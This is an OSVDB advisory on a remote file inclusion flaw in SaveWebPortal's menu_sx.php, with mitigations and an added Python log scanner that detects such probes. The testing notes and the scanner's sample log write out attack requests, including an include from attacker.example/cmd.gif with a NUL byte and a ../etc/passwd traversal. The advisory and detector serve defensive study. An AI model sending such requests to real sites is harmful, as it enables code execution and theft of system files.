SaveWebPortal menu_sx.php CONTENTS_Dir Variable Remote File Inclusion

2005-08-21T15:31:56
ID OSVDB:18931
Type osvdb
Reporter rgod(retrogod@aliceposta.it)
Modified 2005-08-21T15:31:56

Description

Vulnerability Description

SaveWebPortal contains a flaw that may allow a remote attacker to execute arbitrary PHP code. The issue is due to 'menu_sx.php' not validating the 'CONTENTS_Dir' variable before using it as an include path, so a client-supplied value is accepted. An attacker can point the variable at a file on a remote host; PHP code in that file is then fetched and executed by the vulnerable script with the privileges of the web server. Exploitation requires that the PHP configuration permit includes from URLs (allow_url_fopen, and on PHP 5.2 and later also allow_url_include).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue. Pending a vendor fix, the generic PHP hardening against remote file inclusion limits exposure: disable allow_url_fopen (and allow_url_include where the PHP version has it) so include() cannot fetch URLs, and reject requests that supply 'CONTENTS_Dir' with a URL scheme, a NUL byte or directory traversal sequences at the web server or application layer.

Short Description

Remote file inclusion in 'menu_sx.php' via the 'CONTENTS_Dir' variable allows a remote attacker to execute arbitrary PHP code.

Manual Testing Notes

http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00

The trailing %00 is a NUL byte: it truncates anything the script appends to the variable (a file name or extension), so the remote file is fetched exactly as given. This only works when magic_quotes_gpc is off, since magic quotes would escape the NUL. The .gif extension is irrelevant; include() parses whatever PHP code the fetched content contains, so cmd.gif is simply the attacker-hosted file holding the code to run.
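To turn the request pattern above into a detection, the following added example (not part of the OSVDB entry and not SaveWebPortal's own code) scans Apache combined-format access log lines for requests to menu_sx.php whose CONTENTS_Dir value carries a URL scheme, a NUL byte or directory traversal. The log lines, the attacker host and the timestamps are constructed for illustration; the raw query value is decoded to bytes so that %00 is seen as a real NUL rather than being dropped.

```python
"""Flag remote-file-inclusion probes against menu_sx.php in Apache combined logs.

Added example, not part of the OSVDB entry or of SaveWebPortal.  The log lines
below are constructed; the attacker host 'attacker.example' and timestamps are
made up for the demonstration.
"""
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Parameter named in the advisory.  Other include-path parameters could be added.
SUSPECT_PARAMS = {"CONTENTS_Dir"}
TARGET_SCRIPT = "/menu_sx.php"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# RFC 3986 scheme followed by "://": http, https, ftp, php (wrappers), ...
SCHEME_RE = re.compile(rb'^[a-z][a-z0-9+.\-]*://', re.IGNORECASE)


def inclusion_findings(param, raw_value):
    """Reasons a still-percent-encoded parameter value looks like an include attack."""
    value = unquote_to_bytes(raw_value)  # bytes, so %00 survives as an actual NUL
    findings = []
    if SCHEME_RE.match(value):
        findings.append(f"{param}: remote URL")
    if b"\x00" in value:
        findings.append(f"{param}: null byte (suffix truncation)")
    if b".." in value:
        findings.append(f"{param}: directory traversal")
    return findings


def classify_line(line):
    """Return (client_ip, findings) for a menu_sx.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith(TARGET_SCRIPT):
        return None
    findings = []
    # Split the query by hand rather than parse_qsl so the value stays percent-encoded
    for pair in parts.query.split("&"):
        name, _, raw_value = pair.partition("=")
        if name in SUSPECT_PARAMS:
            findings.extend(inclusion_findings(name, raw_value))
    return m.group("ip"), findings


# Constructed sample log: one benign request, two probes, one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Aug/2005:15:31:56 +0000] "GET /saveweb/menu_sx.php?CONTENTS_Dir=contents HTTP/1.1" 200 512',
    '198.51.100.7 - - [21/Aug/2005:15:32:10 +0000] "GET /saveweb/menu_sx.php?CONTENTS_Dir=http://attacker.example/cmd.gif%00 HTTP/1.0" 200 1337',
    '198.51.100.7 - - [21/Aug/2005:15:32:12 +0000] "GET /saveweb/menu_sx.php?CONTENTS_Dir=../../../../etc/passwd%00 HTTP/1.0" 200 2048',
    '10.0.0.5 - - [21/Aug/2005:15:33:00 +0000] "GET /saveweb/index.php HTTP/1.1" 200 4096',
]


def scan(lines):
    """Return [(ip, findings)] for menu_sx.php requests that tripped at least one rule."""
    hits = []
    for line in lines:
        result = classify_line(line)
        if result and result[1]:
            hits.append(result)
    return hits


if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, "; ".join(findings))
```

The scheme check is deliberately broader than http:// because PHP's include() also accepts ftp:// and, in later versions, php:// and data:// wrappers; the NUL check matters on its own, since a NUL in a path parameter has no legitimate use even when no URL is present.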

References:

Vendor URL: http://www.circeos.it/
Security Tracker: 1014748
Secunia Advisory ID: 16522
Related OSVDB IDs: 18927, 18928, 18929, 18930, 18932, 18933, 18934, 18935, 18936
Other Advisory URL: http://rgod.altervista.org/save_yourself_from_savewebportal34.html
CVE: CVE-2005-2687